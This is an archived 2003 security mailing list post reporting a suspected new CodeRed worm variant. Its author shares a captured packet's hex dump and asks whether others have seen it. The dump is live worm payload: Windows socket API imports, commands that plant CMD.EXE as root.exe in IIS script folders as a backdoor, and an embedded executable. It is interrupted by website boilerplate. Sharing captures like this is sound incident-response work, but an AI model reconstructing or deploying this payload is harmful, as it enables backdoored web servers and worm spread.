Hosting Provided By

New CodeRed strain?

From: Frank Knobbe <fknobbe(at)knobbeits.com>
Date: Fri Apr 25 2003 - 14:55:13 EDT

Greetings,

we've been picking up some oddities since yesterday which look like a new CodeRed variant. Traditional signatures didn't identify it as such, but looking at the payload, it appears to be a CodeRed'ish type of bug. We're starting a trap for a complete session now. (So far have only isolated packets).

That isolated packet is below. I'll post the complete session once we catch the whole thing.

Has anyone else seen this?

Regards,
Frank

---8<---

04/25-17:44:56.268467 UTC 200.204.148.110:4699 -> x.x.x.x:80 TCP TTL:105 TOS:0x0 ID:49613 IpLen:20 DgmLen:1500 DF ***A**** Seq: 0xD7D856CE Ack: 0xF3E3078 Win: 0x4470 TcpLen: 20 00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43 ..u..U..E......C 6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55 loseHandle..u..U

F8 89 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74  ..E......_lcreat
00 FF 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F  ..u..U..E......_
6C 77 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8  lwrite..u..U..E.

E8 08 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC ....._lclose..u. FF 55 F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79 .U..E......GetSy 73 74 65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89 stemTime..u..U..

45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C  E......WS2_32.DL
4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63  L..U..E......soc
6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00  ket..u..U..E....

00 00 63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75 ..closesocket..u BC FF 55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74 ..U..E......ioct 6C 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45 lsocket..u..U..E

A4 E8 08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75  ......connect..u
BC FF 55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65  ..U..E......sele
63 74 00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00  ct..u..U..E.....

00 73 65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8 .send..u..U..E..

05 00 00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89  ....recv..u..U..
45 A8 E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61  E......gethostna
6D 65 00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00  me..u..U..E.....

00 67 65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF .gethostbyname.. 75 BC FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41 u..U..E......WSA 47 65 74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC GetLastError..u. FF 55 F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33 .U..E......USER3

32 2E 44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00  2.DLL..U..E.....
00 45 78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF  .ExitWindowsEx..
75 90 FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84  u..U..E...E.i...
08 08 40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1  ..@.E....xV4....
C0 08 C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3  ........<.t.<.t.
C3 E8 ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1  ................
E3 10 E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8  ................
E8 B4 FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF  ......... ......
FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF  ................
FF 00 00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04  .............Y..
81 23 D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F  .#...#.X........
74 9F 80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3  t....t.;.X...t..
68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D  h......\...P.U..

BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E ..\........\CMD. 45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 EXE.^.....cj.... 00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72 ..d:\inetpub\scr 69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C ipts\root.exe... 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 $....\...P.U.j.. 2B 00 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C +...d:\progra~1\ 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C common~1\system\

4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B  MSADC\root.exe..
0C 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA  .$....\...P.U...
Do you need help? 
In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software:Learn more about Pantek's Technical Support offerings
Place an order for 24/7/365 Technical Support here
Learn more about Pantek, who we are, and what we do
Chat with a Live Operator
Related securityfocus.com Links
bugtraq
certification
focus-bsd
focus-ids
focus-ih
focus-linux
focus-ms
focus-sun
focus-unix-other
focus-virus
forensics
incidents
libnet
linux-secnews
ms-secnews
pen-test
secpapers
secprog
sectools
secureshell
security-basics
securityjobs
sf-news
vuln-dev
webappsec
Request more information about Pantek
05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00  ....MZP.........
FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC  ............@...
00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C  ...........PE..L
01 03 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0  ....*%).........
00 8F 81 0B 01 02 19 00 04 00 00 00 08 00 00 00  ................
00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00  ............ ...
00 40 00 00 10 00 00 00 04 00 00 01 00 00 00 00  .@..............
00 00 00 03 00 0A 00 00 00 00 00 00 40 00 00 00  ............@...
04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00  ................
20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10   ...............
00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0C  ............0...
01 FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10  ................
00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00  .......... ..`..
00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 04  ........... ....
00 00 00 0C 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 40 00 00 C0 00 00 00 00 00 00 00 00 00 10  ..@.............
00 00 00 30 00 00 00 04 00 00 00 10 00 00 00 00  ...0............
00 00 00 00 00 00 00 00 00 00 40 00 00 C0 FC FC  ..........@.....
FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC  ................
FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC  ................
FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 68 04 01 00 00 68  ..........h....h
D0 20 40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE  . @..a...... @..
00 20 40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8  . @.....j.h. @..
Do you need more help? 
In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software:Learn more about Pantek's Technical Support offerings
Place an order for 24/7/365 Technical Support here
Learn more about Pantek, who we are, and what we do
Chat with a Live Operator
Related securityfocus.com Links
bugtraq
certification
focus-bsd
focus-ids
focus-ih
focus-linux
focus-ms
focus-sun
focus-unix-other
focus-virus
forensics
incidents
libnet
linux-secnews
ms-secnews
pen-test
secpapers
secprog
sectools
secureshell
security-basics
securityjobs
sf-news
vuln-dev
webappsec
Request more information about Pantek
4C 01 00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31  L........h.'...1
01 00 00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A  .....h.$@.h?...j
00 68 10 20 40 00 68 02 00 00 80 E8 32 01 00 00  .h. @.h.....2...
0B C0 75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68  ..u&j.hT @.j.j.h
48 20 40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF  H @..5.$@.......
35 D8 24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68  5.$@..........h.$@.h
3F 00 0F 00 6A 00 68 58 20 40 00 68 02 00 00 80  ?...j.hX @.h....
E8 ED 00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C  .......uU.. @..L
00 00 00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68  ..... @..B...j.h
B8 20 40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8  . @.j.j.h. @..5.
24 40 00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A  $@......j.h. @.j
01 6A 00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99  .j.h. @..5.$@...
00 00 00 FF 35 D8 24 40 00 E8 9A 00 00 00 C3 C7  ....5.$@........
05 D0 24 40 00 00 04 00 00 68 D0 24 40 00 68 D0  ..$@.........h.$@.h.
20 40 00 68 D4 24 40 00 6A 00 55 FF 35 D8 24 40   @.h.$@.j.U.5.$@
00 E8 60 00 00 00 0B C0 75 49 A1 D0 24 40 00 0B  ..`.....uI..$@..

C0 74 40 BE D0 20 40 00 80 3E 00 74 36 46 66 81 .t@.. @..>.t6Ff. 7E FE 2C 2C 75 F2 C7 06 32 31 37 00 81 EE CC 20 ~.,,u...217....

40 00 89 35                                      @..5

application/pgp-signature attachment: This is a digitally signed message part

Received on Mon Apr 28 13:08:35 2003

Can we help you?

This message: [ Message body ]
Next message: Jason Falciola: "Re: New attack or old Vulnerability Scanner?"
Previous message: paul(at)doevil.com: "RE: SMTP Scans"
Next in thread: Frank Knobbe: "Re: New CodeRed strain?"
Reply: Frank Knobbe: "Re: New CodeRed strain?"
Reply: Frank Knobbe: "Re: New CodeRed strain? -- UPDATE"
Reply: larosa, vjay: "RE: New CodeRed strain? -- UPDATE"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:02:04 EDT